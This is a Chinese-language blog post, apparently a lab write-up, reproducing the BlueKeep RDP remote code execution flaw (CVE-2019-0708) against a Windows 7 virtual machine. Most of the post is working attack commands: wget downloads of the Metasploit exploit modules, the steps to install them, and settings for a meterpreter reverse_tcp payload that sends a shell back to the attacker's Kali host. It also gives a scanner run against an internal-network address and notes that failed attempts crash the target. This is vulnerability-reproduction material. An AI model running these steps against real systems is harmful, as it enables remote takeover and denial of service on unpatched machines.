【漏洞复现】RDP远程桌面漏洞复现(CVE-2019-0708)

一、CVE-2019-0708:

1. 漏洞背景:

  9.7号凌晨一点多,开发者@rapid7在Github上放出了windows 远程桌面服务 RCE漏洞(CVE-2019-0708)exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp复现了一波。

2. 漏洞影响Windows版本:

  • Windows XP SP3 x86
  • Windows XP Professional x64 Edition SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2008 for Itanium-Based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows Server 2003 x64 Edition SP2
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 8和Windows 10及之后版本的用户不受此漏洞影响。

3. 漏洞环境:

靶   机: Win7(X64,SP1)虚拟机:192.168.10.16
          Windows Server 2008 SP2 DataCenter(X64)虚拟机:192.168.10.15 (不在漏洞范围内)

攻 击 机: kali虚拟机:192.168.10.11

二:复现过程:

1、在Kali主机上下载相关的rb文件
命令:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

2、将这些主机文件复制到MSF的相应目录下(其实,主要的攻击文件只有一个:cve_2019_0708_bluekeep_rce.rb,其他几个文件可有可无)。

注:有可能你的MSF的目录不一样,这就需要你自己查找相应的目录。
命令:

# 正常的kali是下面这些命令,因为MSF是装在 /usr/share目录下:
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/    #这里有可能提示不存在这个目录,我们去相应的目录下新建rdp文件夹即可
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
 
# 这里因为我的MSF是更新后的,装在 /opt 目录下,所以,我是下面这几个命令
cp rdp.rb  /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit
cp rdp_scanner.rb  /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner
cp cve_2019_0708_bluekeep_rce.rb   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp  #这里有可能提示不存在这个目录,我们去相应的目录下新建rdp文件夹即可
cp cve_2019_0708_bluekeep.rb  /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp

3、进入MSF,重载模块:reload_all

4、查找漏洞利用模块,进入模块
命令:

search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

5、查看targets

6、设置参数
命令:

set payload windows/x64/meterpreter/reverse_tcp      #设置payload
set rhosts 192.168.10.16                             #目标机ip
set lhost 192.168.10.11              				 #攻击机ip
set rdp_client_ip 192.168.10.16      				 #目标机ip
unset RDP_CLIENT_NAME               				 #取消设置这个参数
set target 2    									 #这里我是vmware的虚拟机,按理来说target应该是设置为3,但是设置为3没打成功,设置为2打成功了

7、攻击成功,成功拿到目标机反弹回来的shell。

注:
按照这个步骤,攻击Windows Server 2008R2蓝屏。看网上说貌似是要改注册表,需要修改注册表:
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam值修改为0。但是我的这个DataCenter的Server2008R2没有这个注册表。而且好像貌似 DataCenter的Server 2008R2并不在漏洞影响系统之内,所以打成蓝屏了。
  看了网上很多人的文章,也都是说打的蓝屏。总的来说,这个漏洞的质量并没有MS17_010永恒之蓝的高,没打成就变成蓝屏了。而且利用起来貌似限制蛮多的。单核服务器上成功率约90%, 双核上 40-60%, 四核上10%,如果失败,目标系统会蓝屏。

三、内网利用:

1、更新于MSF中已有该利用模块:

2、进行漏洞探测:
命令:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RDP_CLIENT_IP 10.8.13.25
set RHOSTS 10.8.13.25
run

在这里插入图片描述

参考文章:
https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
CVE-2019-0708/1181/1182:Windows RDP服务蠕虫级漏洞修复指南(Version 3.0
【预警通告】Windows远程桌面服务远程代码执行漏洞(CVE-2019-0708)EXP披露预警

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值